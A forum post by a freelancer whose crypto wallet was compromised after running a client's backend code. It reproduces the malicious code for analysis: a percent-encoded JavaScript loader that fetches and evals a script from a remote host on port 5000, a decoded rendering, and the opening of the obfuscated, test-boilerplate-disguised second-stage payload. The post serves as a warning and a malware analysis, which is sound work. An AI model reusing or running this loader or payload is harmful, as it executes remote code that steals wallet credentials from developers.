I wanted to share how my MetaMask wallet was hacked yesterday as a cautionary tale.
I received a new project through Freelancer.com. The client had a ‘payment verified’ badge, so I assumed they were legitimate. The project involved web3 backend development, which I was confident I could handle.
After accepting the contract, the client invited me to their GitLab project and asked me to run their backend code. Soon after running it, I realized that my MetaMask wallet had been compromised. Fortunately, I didn’t lose much money, but I want to warn everyone to be cautious when running new code on your machine.
After analyzing the code, I discovered it downloads and executes a script file. I’ve attached the code here.
Can anyone explain how this code works?
Original code
// Stage-1 loader, hidden behind two layers of percent-encoding. Analyse it as text; do not execute it.
// Layer 1 (the string literal below) decodes to:
//   fetch(eval(decodeURIComponent('<layer 2>'))).then(l6irv=>l6irv.text()).then(z1olw=>{eval(z1olw)})
// Layer 2 decodes to a quoted string literal holding the URL (defanged here):
//   hxxp://lianxinxiao[.]com:5000/tokenizer
// so the inner eval() only turns that literal into the string handed to fetch().
// Net effect: the body of a plain-HTTP response is passed to eval(), so whatever the
// server returns runs inside the process that loaded this file. None of the real
// behaviour is in the repository, so reviewing the repository alone cannot show it.
// Review signal: eval(decodeURIComponent(...)) over a long run of %xx escapes is a strong
// red flag in backend code; search for it before installing or starting an unfamiliar project.
eval(decodeURIComponent('%66%65%74%63%68%28%65%76%61%6c%28%64%65%63%6f%64%65%55%52%49%43%6f%6d%70%6f%6e%65%6e%74%28%27%25%32%37%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%36%63%25%36%39%25%36%31%25%36%65%25%37%38%25%36%39%25%36%65%25%37%38%25%36%39%25%36%31%25%36%66%25%32%65%25%36%33%25%36%66%25%36%64%25%33%61%25%33%35%25%33%30%25%33%30%25%33%30%25%32%66%25%37%34%25%36%66%25%36%62%25%36%35%25%36%65%25%36%39%25%37%61%25%36%35%25%37%32%25%32%37%27%29%29%29%2e%74%68%65%6e%28%6c%36%69%72%76%3d%3e%6c%36%69%72%76%2e%74%65%78%74%28%29%29%2e%74%68%65%6e%28%7a%31%6f%6c%77%3d%3e%7b%65%76%61%6c%28%7a%31%6f%6c%77%29%7d%29%20'));
After checking this code, I got the code below:
// Hand-decoded rendering of the one-line loader, kept as the author posted it.
// It is a reading aid, not a byte-accurate decode: in the real decoded text the
// outer eval() receives the whole fetch(...) chain as a string, and the inner
// decodeURIComponent() yields the URL wrapped in quotes (a string literal), which
// the inner eval() turns into the argument for fetch().
eval(
// Request to the remote host over plain HTTP on port 5000.
fetch(
eval(
decodeURIComponent('http://lianxinxiao.com:5000/tokenizer')
)
)
// The response body is read as text ...
.then(l6irv=>l6irv.text())
// ... and executed as JavaScript in the current process. Everything the loader
// does beyond this point is decided by the server's response, not by this file.
.then(z1olw=>{eval(z1olw)})
)
The following script was returned from http://lianxinxiao.com:5000/tokenizer:
// NOTE(review): the header comment below is stock jest-dom setup text, yet nothing in
// the visible part of this script uses jest; presumably it is there to make the file
// look like test boilerplate. Confirm against the full sample.
// NOTE(review): the trailing "Job ID" looks like a per-build or per-target tag; its
// meaning is not established by this page, but it is worth recording as an indicator.
/* learn more: https://github.com/testing-library/jest-dom // @testing-library/jest-dom library provides a set of custom jest matchers that you can use to extend jest. These will make your tests more declarative, clear to read and to maintain.*/ // Job ID: iq8lqtm4u2uu
// Declared here without a value; its use is not visible in the truncated listing.
let QlSfb;
!(function () {
const kOzv = Array.prototype.slice.call(arguments);
return eval(
"(function UdZq(Dt6i){const f18i=PAdh(Dt6i,fT0g(UdZq.toString()));try{let zo1i=eval(f18i);return zo1i.apply(null,kOzv);}catch(bW3i){var DlYg=(0x9D8DE4-0O47306735);while(DlYg<(0o1000232%0x1001D))switch(DlYg){case (0x9D8DE4-0O47306735):DlYg=bW3i instanceof SyntaxError?(262351%0o200054):(0o206534-68918);break;case (0o203504-67365):DlYg=(0o202760-0x105CA);{console.log('Error: the code has been tampered!');return}break;}throw bW3i;}function fT0g(zgTg){let bOVg=199618237;var vbOg=(0o202164-0x1044E);{let XIQg;while(vbOg<(0o400167%65576)){switch(vbOg){case (0o400056%65550):vbOg=(0x102A8-0o201227);{bOVg^=(zgTg.charCodeAt(XIQg)*(0x2935494a%7)+zgTg.charCodeAt(XIQg>>>(0x5E30A78-0O570605164)))^614269451;}break;case (0o400105%65562):vbOg=(0x40055%0o200015);XIQg++;break;case (0x40065%0o200021):vbOg=XIQg<zgTg.length?(0o203124-67138):(0o1000277%65574);break;case (0o400122%0x10016):vbOg=(0o1000135%0x1000F);XIQg=(0x21786%3);break;}}}let r6Ig="";var TDLg=(67396-0o203445);{let TFih;while(TDLg<(0x105F0-0o202712)){switch(TDLg){case (0o204660-67985):TDLg=(0o201274-0x102B2);TFih=(0x21786%3);break;case
…. ….